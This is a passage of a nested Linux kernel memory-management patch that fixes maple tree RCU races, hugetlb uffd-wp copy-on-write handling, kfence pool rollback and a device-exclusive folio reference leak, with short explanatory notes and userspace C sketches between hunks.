+-		mas_set_alloc_req(mas, ret->request_count + 1);
+-		ret->request_count = 0;
++	if (req) {
++		req++;
++		mas_set_alloc_req(mas, req);
+ 	}
++
++	memset(ret, 0, sizeof(*ret));
+ 	return (struct maple_node *)ret;
+ }
+ 
+@@ -1179,21 +1231,20 @@ static inline void mas_push_node(struct ma_state *mas, struct maple_node *used)
+ 	unsigned long count;
+ 	unsigned int requested = mas_alloc_req(mas);
+ 
+-	memset(reuse, 0, sizeof(*reuse));
+ 	count = mas_allocated(mas);
+ 
+-	if (count && (head->node_count < MAPLE_ALLOC_SLOTS - 1)) {
+-		if (head->slot[0])
+-			head->node_count++;
+-		head->slot[head->node_count] = reuse;
++	reuse->request_count = 0;
++	reuse->node_count = 0;
++	if (count && (head->node_count < MAPLE_ALLOC_SLOTS)) {
++		head->slot[head->node_count++] = reuse;
+ 		head->total++;
+ 		goto done;
+ 	}
+ 
+ 	reuse->total = 1;
+ 	if ((head) && !((unsigned long)head & 0x1)) {
+-		head->request_count = 0;
+ 		reuse->slot[0] = head;
++		reuse->node_count = 1;
+ 		reuse->total += head->total;
+ 	}
+ 
+@@ -1212,7 +1263,6 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ {
+ 	struct maple_alloc *node;
+ 	unsigned long allocated = mas_allocated(mas);
+-	unsigned long success = allocated;
+ 	unsigned int requested = mas_alloc_req(mas);
+ 	unsigned int count;
+ 	void **slots = NULL;
+@@ -1228,24 +1278,29 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 		WARN_ON(!allocated);
+ 	}
+ 
+-	if (!allocated || mas->alloc->node_count == MAPLE_ALLOC_SLOTS - 1) {
++	if (!allocated || mas->alloc->node_count == MAPLE_ALLOC_SLOTS) {
+ 		node = (struct maple_alloc *)mt_alloc_one(gfp);
+ 		if (!node)
+ 			goto nomem_one;
+ 
+-		if (allocated)
++		if (allocated) {
+ 			node->slot[0] = mas->alloc;
++			node->node_count = 1;
++		} else {
++			node->node_count = 0;
++		}
+ 
+-		success++;
+ 		mas->alloc = node;
++		node->total = ++allocated;
+ 		requested--;
+ 	}
+ 
+ 	node = mas->alloc;
++	node->request_count = 0;
+ 	while (requested) {
+ 		max_req = MAPLE_ALLOC_SLOTS;
+-		if (node->slot[0]) {
+-			unsigned int offset = node->node_count + 1;
++		if (node->node_count) {
++			unsigned int offset = node->node_count;
+ 
+ 			slots = (void **)&node->slot[offset];
+ 			max_req -= offset;
+@@ -1259,15 +1314,13 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 			goto nomem_bulk;
+ 
+ 		node->node_count += count;
+-		/* zero indexed. */
+-		if (slots == (void **)&node->slot)
+-			node->node_count--;
+-
+-		success += count;
++		allocated += count;
+ 		node = node->slot[0];
++		node->node_count = 0;
++		node->request_count = 0;
+ 		requested -= count;
+ 	}
+-	mas->alloc->total = success;
++	mas->alloc->total = allocated;
+ 	return;
+ 
+ nomem_bulk:
+@@ -1276,7 +1329,7 @@ nomem_bulk:
+ nomem_one:
+ 	mas_set_alloc_req(mas, requested);
+ 	if (mas->alloc && !(((unsigned long)mas->alloc & 0x1)))
+-		mas->alloc->total = success;
++		mas->alloc->total = allocated;
+ 	mas_set_err(mas, -ENOMEM);
+ 	return;
+ 
+@@ -1334,7 +1387,7 @@ static void mas_node_count(struct ma_state *mas, int count)
+  * mas_start() - Sets up maple state for operations.
+  * @mas: The maple state.
+  *
+- * If mas->node == MAS_START, then set the min, max, depth, and offset to
++ * If mas->node == MAS_START, then set the min, max and depth to
+  * defaults.
+  *
+  * Return:
+@@ -1348,22 +1401,26 @@ static inline struct maple_enode *mas_start(struct ma_state *mas)
+ 	if (likely(mas_is_start(mas))) {
+ 		struct maple_enode *root;
+ 
+-		mas->node = MAS_NONE;
+ 		mas->min = 0;
+ 		mas->max = ULONG_MAX;
+ 		mas->depth = 0;
+-		mas->offset = 0;
+ 
++retry:
+ 		root = mas_root(mas);
+ 		/* Tree with nodes */
+ 		if (likely(xa_is_node(root))) {
+ 			mas->depth = 1;
+ 			mas->node = mte_safe_root(root);
++			mas->offset = 0;
++			if (mte_dead_node(mas->node))
++				goto retry;
++
+ 			return NULL;
+ 		}
+ 
+ 		/* empty tree */
+ 		if (unlikely(!root)) {
++			mas->node = MAS_NONE;
+ 			mas->offset = MAPLE_NODE_SLOTS;
+ 			return NULL;
+ 		}
+@@ -1399,6 +1456,9 @@ static inline unsigned char ma_data_end(struct maple_node *node,
+ {
+ 	unsigned char offset;
+ 
++	if (!pivots)
++		return 0;
++
+ 	if (type == maple_arange_64)
+ 		return ma_meta_end(node, type);
+ 
+@@ -1434,6 +1494,9 @@ static inline unsigned char mas_data_end(struct ma_state *mas)
+ 		return ma_meta_end(node, type);
+ 
+ 	pivots = ma_pivots(node, type);
++	if (unlikely(ma_dead_node(node)))
++		return 0;
++
+ 	offset = mt_pivots[type] - 1;
+ 	if (likely(!pivots[offset]))
+ 		return ma_meta_end(node, type);
+@@ -3659,10 +3722,9 @@ static inline int mas_root_expand(struct ma_state *mas, void *entry)
+ 		slot++;
+ 	mas->depth = 1;
+ 	mas_set_height(mas);
+-
++	ma_set_meta(node, maple_leaf_64, 0, slot);
+ 	/* swap the new root into the tree */
+ 	rcu_assign_pointer(mas->tree->ma_root, mte_mk_root(mas->node));
+-	ma_set_meta(node, maple_leaf_64, 0, slot);
+ 	return slot;
+ }
+ 
+@@ -3875,18 +3937,13 @@ static inline void *mtree_lookup_walk(struct ma_state *mas)
+ 		end = ma_data_end(node, type, pivots, max);
+ 		if (unlikely(ma_dead_node(node)))
+ 			goto dead_node;
+-
+-		if (pivots[offset] >= mas->index)
+-			goto next;
+-
+ 		do {
+-			offset++;
+-		} while ((offset < end) && (pivots[offset] < mas->index));
+-
+-		if (likely(offset > end))
+-			max = pivots[offset];
++			if (pivots[offset] >= mas->index) {
++				max = pivots[offset];
++				break;
++			}
++		} while (++offset < end);
+ 
+-next:
+ 		slots = ma_slots(node, type);
+ 		next = mt_slot(mas->tree, slots, offset);
+ 		if (unlikely(ma_dead_node(node)))
+@@ -4505,6 +4562,9 @@ static inline int mas_prev_node(struct ma_state *mas, unsigned long min)
+ 	node = mas_mn(mas);
+ 	slots = ma_slots(node, mt);
+ 	pivots = ma_pivots(node, mt);
++	if (unlikely(ma_dead_node(node)))
++		return 1;
++
+ 	mas->max = pivots[offset];
+ 	if (offset)
+ 		mas->min = pivots[offset - 1] + 1;
+@@ -4526,6 +4586,9 @@ static inline int mas_prev_node(struct ma_state *mas, unsigned long min)
+ 		slots = ma_slots(node, mt);
+ 		pivots = ma_pivots(node, mt);
+ 		offset = ma_data_end(node, mt, pivots, mas->max);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
+ 		if (offset)
+ 			mas->min = pivots[offset - 1] + 1;
+ 
+@@ -4574,6 +4637,7 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 	struct maple_enode *enode;
+ 	int level = 0;
+ 	unsigned char offset;
++	unsigned char node_end;
+ 	enum maple_type mt;
+ 	void __rcu **slots;
+ 
+@@ -4597,7 +4661,11 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 		node = mas_mn(mas);
+ 		mt = mte_node_type(mas->node);
+ 		pivots = ma_pivots(node, mt);
+-	} while (unlikely(offset == ma_data_end(node, mt, pivots, mas->max)));
++		node_end = ma_data_end(node, mt, pivots, mas->max);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
++	} while (unlikely(offset == node_end));
+ 
+ 	slots = ma_slots(node, mt);
+ 	pivot = mas_safe_pivot(mas, pivots, ++offset, mt);
+@@ -4613,6 +4681,9 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 		mt = mte_node_type(mas->node);
+ 		slots = ma_slots(node, mt);
+ 		pivots = ma_pivots(node, mt);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
+ 		offset = 0;
+ 		pivot = pivots[0];
+ 	}
+@@ -4659,16 +4730,19 @@ static inline void *mas_next_nentry(struct ma_state *mas,
+ 		return NULL;
+ 	}
+ 
+-	pivots = ma_pivots(node, type);
+ 	slots = ma_slots(node, type);
++	pivots = ma_pivots(node, type);
++	count = ma_data_end(node, type, pivots, mas->max);
++	if (unlikely(ma_dead_node(node)))
++		return NULL;
++
+ 	mas->index = mas_safe_min(mas, pivots, mas->offset);
+-	if (ma_dead_node(node))
++	if (unlikely(ma_dead_node(node)))
+ 		return NULL;
+ 
+ 	if (mas->index > max)
+ 		return NULL;
+ 
+-	count = ma_data_end(node, type, pivots, mas->max);
+ 	if (mas->offset > count)
+ 		return NULL;
+ 
+@@ -4743,6 +4817,11 @@ static inline void *mas_next_entry(struct ma_state *mas, unsigned long limit)
+ 	unsigned long last;
+ 	enum maple_type mt;
+ 
++	if (mas->index > limit) {
++		mas->index = mas->last = limit;
++		mas_pause(mas);
++		return NULL;
++	}
+ 	last = mas->last;
+ retry:
+ 	offset = mas->offset;
+@@ -4816,6 +4895,11 @@ retry:
+ 
+ 	slots = ma_slots(mn, mt);
+ 	pivots = ma_pivots(mn, mt);
++	if (unlikely(ma_dead_node(mn))) {
++		mas_rewalk(mas, index);
++		goto retry;
++	}
++
+ 	if (offset == mt_pivots[mt])
+ 		pivot = mas->max;
+ 	else
+@@ -4849,6 +4933,11 @@ static inline void *mas_prev_entry(struct ma_state *mas, unsigned long min)
+ {
+ 	void *entry;
+ 
++	if (mas->index < min) {
++		mas->index = mas->last = min;
++		mas->node = MAS_NONE;
++		return NULL;
++	}
+ retry:
+ 	while (likely(!mas_is_none(mas))) {
+ 		entry = mas_prev_nentry(mas, min, mas->index);
+@@ -5394,24 +5483,26 @@ no_gap:
+ }
+ 
+ /*
+- * mas_dead_leaves() - Mark all leaves of a node as dead.
++ * mte_dead_leaves() - Mark all leaves of a node as dead.
+  * @mas: The maple state
+  * @slots: Pointer to the slot array
++ * @type: The maple node type
+  *
+  * Must hold the write lock.
+  *
+  * Return: The number of leaves marked as dead.
+  */
+ static inline
+-unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
++unsigned char mte_dead_leaves(struct maple_enode *enode, struct maple_tree *mt,
++			      void __rcu **slots)
+ {
+ 	struct maple_node *node;
+ 	enum maple_type type;
+ 	void *entry;
+ 	int offset;
+ 
+-	for (offset = 0; offset < mt_slot_count(mas->node); offset++) {
+-		entry = mas_slot_locked(mas, slots, offset);
++	for (offset = 0; offset < mt_slot_count(enode); offset++) {
++		entry = mt_slot(mt, slots, offset);
+ 		type = mte_node_type(entry);
+ 		node = mte_to_node(entry);
+ 		/* Use both node and type to catch LE & BE metadata */
+@@ -5419,7 +5510,6 @@ unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
+ 			break;
+ 
+ 		mte_set_node_dead(entry);
+-		smp_wmb(); /* Needed for RCU */
+ 		node->type = type;
+ 		rcu_assign_pointer(slots[offset], node);
+ 	}
+@@ -5427,151 +5517,160 @@ unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
+ 	return offset;
+ }
+ 
+-static void __rcu **mas_dead_walk(struct ma_state *mas, unsigned char offset)
++/**
++ * mte_dead_walk() - Walk down a dead tree to just before the leaves
++ * @enode: The maple encoded node
++ * @offset: The starting offset
++ *
++ * Note: This can only be used from the RCU callback context.
++ */
++static void __rcu **mte_dead_walk(struct maple_enode **enode, unsigned char offset)
+ {
+ 	struct maple_node *node, *next;
+ 	void __rcu **slots = NULL;
+ 
+-	next = mas_mn(mas);
++	next = mte_to_node(*enode);
+ 	do {
+-		mas->node = ma_enode_ptr(next);
+-		node = mas_mn(mas);
++		*enode = ma_enode_ptr(next);
++		node = mte_to_node(*enode);
+ 		slots = ma_slots(node, node->type);
+-		next = mas_slot_locked(mas, slots, offset);
++		next = rcu_dereference_protected(slots[offset],
++					lock_is_held(&rcu_callback_map));
+ 		offset = 0;
+ 	} while (!ma_is_leaf(next->type));
+ 
+ 	return slots;
+ }
+ 
++/**
++ * mt_free_walk() - Walk & free a tree in the RCU callback context
++ * @head: The RCU head that's within the node.
++ *
++ * Note: This can only be used from the RCU callback context.
++ */
+ static void mt_free_walk(struct rcu_head *head)
+ {
+ 	void __rcu **slots;
+ 	struct maple_node *node, *start;
+-	struct maple_tree mt;
++	struct maple_enode *enode;
+ 	unsigned char offset;
+ 	enum maple_type type;
+-	MA_STATE(mas, &mt, 0, 0);
+ 
+ 	node = container_of(head, struct maple_node, rcu);
+ 
+ 	if (ma_is_leaf(node->type))
+ 		goto free_leaf;
+ 
+-	mt_init_flags(&mt, node->ma_flags);
+-	mas_lock(&mas);
+ 	start = node;
+-	mas.node = mt_mk_node(node, node->type);
+-	slots = mas_dead_walk(&mas, 0);
+-	node = mas_mn(&mas);
++	enode = mt_mk_node(node, node->type);
++	slots = mte_dead_walk(&enode, 0);
++	node = mte_to_node(enode);
+ 	do {
+ 		mt_free_bulk(node->slot_len, slots);
+ 		offset = node->parent_slot + 1;
+-		mas.node = node->piv_parent;
+-		if (mas_mn(&mas) == node)
+-			goto start_slots_free;
+-
+-		type = mte_node_type(mas.node);
+-		slots = ma_slots(mte_to_node(mas.node), type);
+-		if ((offset < mt_slots[type]) && (slots[offset]))
+-			slots = mas_dead_walk(&mas, offset);
+-
+-		node = mas_mn(&mas);
++		enode = node->piv_parent;
++		if (mte_to_node(enode) == node)
++			goto free_leaf;
++
++		type = mte_node_type(enode);
++		slots = ma_slots(mte_to_node(enode), type);
++		if ((offset < mt_slots[type]) &&
++		    rcu_dereference_protected(slots[offset],
++					      lock_is_held(&rcu_callback_map)))
++			slots = mte_dead_walk(&enode, offset);
++		node = mte_to_node(enode);
+ 	} while ((node != start) || (node->slot_len < offset));
+ 
+ 	slots = ma_slots(node, node->type);
+ 	mt_free_bulk(node->slot_len, slots);
+ 
+-start_slots_free:
+-	mas_unlock(&mas);
+ free_leaf:
+ 	mt_free_rcu(&node->rcu);
+ }
+ 
+-static inline void __rcu **mas_destroy_descend(struct ma_state *mas,
+-			struct maple_enode *prev, unsigned char offset)
++static inline void __rcu **mte_destroy_descend(struct maple_enode **enode,
++	struct maple_tree *mt, struct maple_enode *prev, unsigned char offset)
+ {
+ 	struct maple_node *node;
+-	struct maple_enode *next = mas->node;
++	struct maple_enode *next = *enode;
+ 	void __rcu **slots = NULL;
++	enum maple_type type;
++	unsigned char next_offset = 0;
+ 
+ 	do {
+-		mas->node = next;
+-		node = mas_mn(mas);
+-		slots = ma_slots(node, mte_node_type(mas->node));
+-		next = mas_slot_locked(mas, slots, 0);
++		*enode = next;
++		node = mte_to_node(*enode);
++		type = mte_node_type(*enode);
++		slots = ma_slots(node, type);
++		next = mt_slot_locked(mt, slots, next_offset);
+ 		if ((mte_dead_node(next)))
+-			next = mas_slot_locked(mas, slots, 1);
++			next = mt_slot_locked(mt, slots, ++next_offset);
+ 
+-		mte_set_node_dead(mas->node);
+-		node->type = mte_node_type(mas->node);
++		mte_set_node_dead(*enode);
++		node->type = type;
+ 		node->piv_parent = prev;
+ 		node->parent_slot = offset;
+-		offset = 0;
+-		prev = mas->node;
++		offset = next_offset;
++		next_offset = 0;
++		prev = *enode;
+ 	} while (!mte_is_leaf(next));
+ 
+ 	return slots;
+ }
+ 
+-static void mt_destroy_walk(struct maple_enode *enode, unsigned char ma_flags,
++static void mt_destroy_walk(struct maple_enode *enode, struct maple_tree *mt,
+ 			    bool free)
+ {
+ 	void __rcu **slots;
+ 	struct maple_node *node = mte_to_node(enode);
+ 	struct maple_enode *start;
+-	struct maple_tree mt;
+-
+-	MA_STATE(mas, &mt, 0, 0);
+ 
+-	if (mte_is_leaf(enode))
++	if (mte_is_leaf(enode)) {
++		node->type = mte_node_type(enode);
+ 		goto free_leaf;
++	}
+ 
+-	mt_init_flags(&mt, ma_flags);
+-	mas_lock(&mas);
+-
+-	mas.node = start = enode;
+-	slots = mas_destroy_descend(&mas, start, 0);
+-	node = mas_mn(&mas);
++	start = enode;
++	slots = mte_destroy_descend(&enode, mt, start, 0);
++	node = mte_to_node(enode); // Updated in the above call.
+ 	do {
+ 		enum maple_type type;
+ 		unsigned char offset;
+ 		struct maple_enode *parent, *tmp;
+ 
+-		node->slot_len = mas_dead_leaves(&mas, slots);
++		node->slot_len = mte_dead_leaves(enode, mt, slots);
+ 		if (free)
+ 			mt_free_bulk(node->slot_len, slots);
+ 		offset = node->parent_slot + 1;
+-		mas.node = node->piv_parent;
+-		if (mas_mn(&mas) == node)
+-			goto start_slots_free;
++		enode = node->piv_parent;
++		if (mte_to_node(enode) == node)
++			goto free_leaf;
+ 
+-		type = mte_node_type(mas.node);
+-		slots = ma_slots(mte_to_node(mas.node), type);
++		type = mte_node_type(enode);
++		slots = ma_slots(mte_to_node(enode), type);
+ 		if (offset >= mt_slots[type])
+ 			goto next;
+ 
+-		tmp = mas_slot_locked(&mas, slots, offset);
++		tmp = mt_slot_locked(mt, slots, offset);
+ 		if (mte_node_type(tmp) && mte_to_node(tmp)) {
+-			parent = mas.node;
+-			mas.node = tmp;
+-			slots = mas_destroy_descend(&mas, parent, offset);
++			parent = enode;
++			enode = tmp;
++			slots = mte_destroy_descend(&enode, mt, parent, offset);
+ 		}
+ next:
+-		node = mas_mn(&mas);
+-	} while (start != mas.node);
++		node = mte_to_node(enode);
++	} while (start != enode);
+ 
+-	node = mas_mn(&mas);
+-	node->slot_len = mas_dead_leaves(&mas, slots);
++	node = mte_to_node(enode);
++	node->slot_len = mte_dead_leaves(enode, mt, slots);
+ 	if (free)
+ 		mt_free_bulk(node->slot_len, slots);
+ 
+-start_slots_free:
+-	mas_unlock(&mas);
+-
+ free_leaf:
+ 	if (free)
+ 		mt_free_rcu(&node->rcu);
++	else
++		mt_clear_meta(mt, node, node->type);
+ }
+ 
+ /*
+@@ -5587,15 +5686,18 @@ static inline void mte_destroy_walk(struct maple_enode *enode,
+ 	struct maple_node *node = mte_to_node(enode);
+ 
+ 	if (mt_in_rcu(mt)) {
+-		mt_destroy_walk(enode, mt->ma_flags, false);
++		mt_destroy_walk(enode, mt, false);
+ 		call_rcu(&node->rcu, mt_free_walk);
+ 	} else {
+-		mt_destroy_walk(enode, mt->ma_flags, true);
++		mt_destroy_walk(enode, mt, true);
+ 	}
+ }
+ 
+ static void mas_wr_store_setup(struct ma_wr_state *wr_mas)
+ {
++	if (unlikely(mas_is_paused(wr_mas->mas)))
++		mas_reset(wr_mas->mas);
++
+ 	if (!mas_is_start(wr_mas->mas)) {
+ 		if (mas_is_none(wr_mas->mas)) {
+ 			mas_reset(wr_mas->mas);
+@@ -5731,6 +5833,7 @@ int mas_preallocate(struct ma_state *mas, void *entry, gfp_t gfp)
+ void mas_destroy(struct ma_state *mas)
+ {
+ 	struct maple_alloc *node;
++	unsigned long total;
+ 
+ 	/*
+ 	 * When using mas_for_each() to insert an expected number of elements,
+@@ -5753,14 +5856,20 @@ void mas_destroy(struct ma_state *mas)
+ 	}
+ 	mas->mas_flags &= ~(MA_STATE_BULK|MA_STATE_PREALLOC);
+ 
+-	while (mas->alloc && !((unsigned long)mas->alloc & 0x1)) {
++	total = mas_allocated(mas);
++	while (total) {
+ 		node = mas->alloc;
+ 		mas->alloc = node->slot[0];
+-		if (node->node_count > 0)
+-			mt_free_bulk(node->node_count,
+-				     (void __rcu **)&node->slot[1]);
++		if (node->node_count > 1) {
++			size_t count = node->node_count - 1;
++
++			mt_free_bulk(count, (void __rcu **)&node->slot[1]);
++			total -= count;
++		}
+ 		kmem_cache_free(maple_node_cache, node);
++		total--;
+ 	}
++
+ 	mas->alloc = NULL;
+ }
+ EXPORT_SYMBOL_GPL(mas_destroy);
+@@ -5898,6 +6007,7 @@ void *mas_prev(struct ma_state *mas, unsigned long min)
+ 	if (!mas->index) {
+ 		/* Nothing comes before 0 */
+ 		mas->last = 0;
++		mas->node = MAS_NONE;
+ 		return NULL;
+ 	}
+ 
+@@ -5988,6 +6098,9 @@ void *mas_find(struct ma_state *mas, unsigned long max)
+ 		mas->index = ++mas->last;
+ 	}
+ 
++	if (unlikely(mas_is_none(mas)))
++		mas->node = MAS_START;
++
+ 	if (unlikely(mas_is_start(mas))) {
+ 		/* First run or continue */
+ 		void *entry;
+@@ -6599,11 +6712,11 @@ static inline void *mas_first_entry(struct ma_state *mas, struct maple_node *mn,
+ 	while (likely(!ma_is_leaf(mt))) {
+ 		MT_BUG_ON(mas->tree, mte_dead_node(mas->node));
+ 		slots = ma_slots(mn, mt);
+-		pivots = ma_pivots(mn, mt);
+-		max = pivots[0];
+ 		entry = mas_slot(mas, slots, 0);
++		pivots = ma_pivots(mn, mt);
+ 		if (unlikely(ma_dead_node(mn)))
+ 			return NULL;
++		max = pivots[0];
+ 		mas->node = entry;
+ 		mn = mas_mn(mas);
+ 		mt = mte_node_type(mas->node);
+@@ -6623,13 +6736,13 @@ static inline void *mas_first_entry(struct ma_state *mas, struct maple_node *mn,
+ 	if (likely(entry))
+ 		return entry;
+ 
+-	pivots = ma_pivots(mn, mt);
+-	mas->index = pivots[0] + 1;
+ 	mas->offset = 1;
+ 	entry = mas_slot(mas, slots, 1);
++	pivots = ma_pivots(mn, mt);
+ 	if (unlikely(ma_dead_node(mn)))
+ 		return NULL;
+ 
++	mas->index = pivots[0] + 1;
+ 	if (mas->index > limit)
+ 		goto none;
+ 
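[Note on the maple-tree hunks above: most of them apply one recipe for lock-free readers -- load the slots/pivots pointers first, then re-check ma_dead_node() (which now contains an smp_rmb()) and bail out or rewalk if the node was freed and reused underneath, as mas_next_entry() and friends now do. A self-contained sketch of that validate-after-read discipline, using a C11 atomic "dead" flag in place of the kernel's parent-pointer trick:

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

struct node {
	int pivot;			/* data a reader wants */
	atomic_bool dead;		/* set when the node is retired */
};

/* Returns true and fills *out only if the node stayed live across the
 * read; otherwise the caller must rewalk from the root. */
static bool read_pivot(struct node *n, int *out)
{
	int v = n->pivot;				/* speculative read */
	atomic_thread_fence(memory_order_acquire);	/* smp_rmb() analogue:
							 * don't reorder the read
							 * past the dead check */
	if (atomic_load_explicit(&n->dead, memory_order_relaxed))
		return false;				/* freed: retry walk */
	*out = v;
	return true;
}

int main(void)
{
	struct node n = { .pivot = 7 };
	int v;

	atomic_init(&n.dead, false);
	if (read_pivot(&n, &v))
		printf("pivot %d\n", v);

	atomic_store(&n.dead, true);			/* node retired */
	if (!read_pivot(&n, &v))
		printf("stale node detected, rewalk\n");
	return 0;
}
]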
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index bdbfeb6fb3934..4d338f70155cf 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -5476,7 +5476,7 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		       struct page *pagecache_page, spinlock_t *ptl)
+ {
+ 	const bool unshare = flags & FAULT_FLAG_UNSHARE;
+-	pte_t pte;
++	pte_t pte = huge_ptep_get(ptep);
+ 	struct hstate *h = hstate_vma(vma);
+ 	struct page *old_page, *new_page;
+ 	int outside_reserve = 0;
+@@ -5484,6 +5484,17 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	unsigned long haddr = address & huge_page_mask(h);
+ 	struct mmu_notifier_range range;
+ 
++	/*
++	 * Never handle CoW for uffd-wp protected pages.  It should be only
++	 * handled when the uffd-wp protection is removed.
++	 *
++	 * Note that only the CoW optimization path (in hugetlb_no_page())
++	 * can trigger this, because hugetlb_fault() will always resolve
++	 * uffd-wp bit first.
++	 */
++	if (!unshare && huge_pte_uffd_wp(pte))
++		return 0;
++
+ 	/*
+ 	 * hugetlb does not support FOLL_FORCE-style write faults that keep the
+ 	 * PTE mapped R/O such as maybe_mkwrite() would do.
+@@ -5497,7 +5508,6 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		return 0;
+ 	}
+ 
+-	pte = huge_ptep_get(ptep);
+ 	old_page = pte_page(pte);
+ 
+ 	delayacct_wpcopy_start();
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index 79c94ee55f97b..1065e0568d05a 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -556,15 +556,11 @@ static unsigned long kfence_init_pool(void)
+ 	 * enters __slab_free() slow-path.
+ 	 */
+ 	for (i = 0; i < KFENCE_POOL_SIZE / PAGE_SIZE; i++) {
+-		struct slab *slab = page_slab(&pages[i]);
++		struct slab *slab = page_slab(nth_page(pages, i));
+ 
+ 		if (!i || (i % 2))
+ 			continue;
+ 
+-		/* Verify we do not have a compound head page. */
+-		if (WARN_ON(compound_head(&pages[i]) != &pages[i]))
+-			return addr;
+-
+ 		__folio_set_slab(slab_folio(slab));
+ #ifdef CONFIG_MEMCG
+ 		slab->memcg_data = (unsigned long)&kfence_metadata[i / 2 - 1].objcg |
+@@ -597,12 +593,26 @@ static unsigned long kfence_init_pool(void)
+ 
+ 		/* Protect the right redzone. */
+ 		if (unlikely(!kfence_protect(addr + PAGE_SIZE)))
+-			return addr;
++			goto reset_slab;
+ 
+ 		addr += 2 * PAGE_SIZE;
+ 	}
+ 
+ 	return 0;
++
++reset_slab:
++	for (i = 0; i < KFENCE_POOL_SIZE / PAGE_SIZE; i++) {
++		struct slab *slab = page_slab(nth_page(pages, i));
++
++		if (!i || (i % 2))
++			continue;
++#ifdef CONFIG_MEMCG
++		slab->memcg_data = 0;
++#endif
++		__folio_clear_slab(slab_folio(slab));
++	}
++
++	return addr;
+ }
+ 
+ static bool __init kfence_init_pool_early(void)
+@@ -632,16 +642,6 @@ static bool __init kfence_init_pool_early(void)
+ 	 * fails for the first page, and therefore expect addr==__kfence_pool in
+ 	 * most failure cases.
+ 	 */
+-	for (char *p = (char *)addr; p < __kfence_pool + KFENCE_POOL_SIZE; p += PAGE_SIZE) {
+-		struct slab *slab = virt_to_slab(p);
+-
+-		if (!slab)
+-			continue;
+-#ifdef CONFIG_MEMCG
+-		slab->memcg_data = 0;
+-#endif
+-		__folio_clear_slab(slab_folio(slab));
+-	}
+ 	memblock_free_late(__pa(addr), KFENCE_POOL_SIZE - (addr - (unsigned long)__kfence_pool));
+ 	__kfence_pool = NULL;
+ 	return false;
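[Note on the kfence hunk above: it replaces a bare early return in kfence_init_pool() with a reset_slab unwind, so when protecting a redzone fails partway through, the pages already converted to slabs are converted back before the pool memory is returned. A runnable sketch of that roll-back-what-you-did loop shape; the conversion step is a stand-in for __folio_set_slab()/kfence_protect():

#include <stdio.h>

#define N 8

static int convert(int *page, int i)
{
	if (i == 5)		/* simulate kfence_protect() failing here */
		return -1;
	*page = 1;		/* page now marked as a slab */
	return 0;
}

int main(void)
{
	int slab[N] = {0};
	int i;

	for (i = 0; i < N; i++) {
		if (convert(&slab[i], i) < 0)
			goto reset;
	}
	puts("pool initialised");
	return 0;

reset:
	for (int j = 0; j < i; j++)	/* undo every completed step */
		slab[j] = 0;
	printf("failed at page %d, rolled back %d pages\n", i, i);
	return 1;
}
]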
+diff --git a/mm/memory.c b/mm/memory.c
+index f526b9152bef2..6a99e9dc07e6e 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3580,8 +3580,21 @@ static vm_fault_t remove_device_exclusive_entry(struct vm_fault *vmf)
+ 	struct vm_area_struct *vma = vmf->vma;
+ 	struct mmu_notifier_range range;
+ 
+-	if (!folio_lock_or_retry(folio, vma->vm_mm, vmf->flags))
++	/*
++	 * We need a reference to lock the folio because we don't hold
++	 * the PTL so a racing thread can remove the device-exclusive
++	 * entry and unmap it. If the folio is free the entry must
++	 * have been removed already. If it happens to have already
++	 * been re-allocated after being freed all we do is lock and
++	 * unlock it.
++	 */
++	if (!folio_try_get(folio))
++		return 0;
++
++	if (!folio_lock_or_retry(folio, vma->vm_mm, vmf->flags)) {
++		folio_put(folio);
+ 		return VM_FAULT_RETRY;
++	}
+ 	mmu_notifier_range_init_owner(&range, MMU_NOTIFY_EXCLUSIVE, 0, vma,
+ 				vma->vm_mm, vmf->address & PAGE_MASK,
+ 				(vmf->address & PAGE_MASK) + PAGE_SIZE, NULL);
+@@ -3594,6 +3607,7 @@ static vm_fault_t remove_device_exclusive_entry(struct vm_fault *vmf)
+ 
+ 	pte_unmap_unlock(vmf->pte, vmf->ptl);
+ 	folio_unlock(folio);
++	folio_put(folio);
+ 
+ 	mmu_notifier_invalidate_range_end(&range);
+ 	return 0;
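[Note on the mm/memory.c hunk above: it takes a reference with folio_try_get() before locking, because without the PTL the folio can be freed, or freed and reallocated, concurrently; a try-get fails on a zero refcount instead of resurrecting a dead object. A userspace sketch of the increment-unless-zero primitive behind that pattern:

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

/* Take a reference only if the object is still live (refcount > 0);
 * mirrors the semantics of folio_try_get(). */
static bool try_get(atomic_int *refs)
{
	int old = atomic_load(refs);

	while (old != 0) {
		if (atomic_compare_exchange_weak(refs, &old, old + 1))
			return true;	/* reference taken */
	}
	return false;			/* already freed: caller backs off */
}

static bool put(atomic_int *refs)
{
	return atomic_fetch_sub(refs, 1) == 1;	/* true: last reference */
}

int main(void)
{
	atomic_int refs;

	atomic_init(&refs, 1);
	if (try_get(&refs))
		puts("got reference, safe to lock/unlock the object");
	put(&refs);			/* drop our reference */
	if (put(&refs))
		puts("last reference dropped, object freed");
	if (!try_get(&refs))
		puts("try_get on freed object correctly fails");
	return 0;
}
]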
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 425a9349e6108..1931da077b2f9 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -2308,7 +2308,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
